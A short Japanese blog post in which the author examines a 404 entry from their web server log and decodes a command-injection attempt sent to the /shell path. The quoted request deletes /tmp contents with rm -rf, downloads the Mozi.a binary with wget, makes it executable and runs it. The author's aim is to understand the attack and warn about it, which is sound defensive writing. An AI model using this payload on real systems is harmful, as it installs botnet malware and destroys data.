何がしたいんだろう

 Web サーバのログで、404 をウォッチしていたら次のようなログがありました。

… "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 497 "-" "Hello, world"

 あわよくば、SHELL でコマンドを実行しようとしています。コマンドは次のように解釈されると思います。

cd /tmp
rm -rf *
wget http://192.168.1.1:8088/Mozi.a
chmod 777 Mozi.a
/tmp/Mozi.a jaw

 /tmp の内容を全部削除して、192.168.1.1 から Mozi.a をダウンロードしています。そしてオプション jaw を付けて実行しようとしています。192.168.1.1 ってローカル IP アドレスです。当然、ダウンロードできません。

 何がしたいのかよくわかりません。しかし、Web サーバ上で SHELL を実行できるような環境は危険だということでしょう。

web サイト

Posted by sirius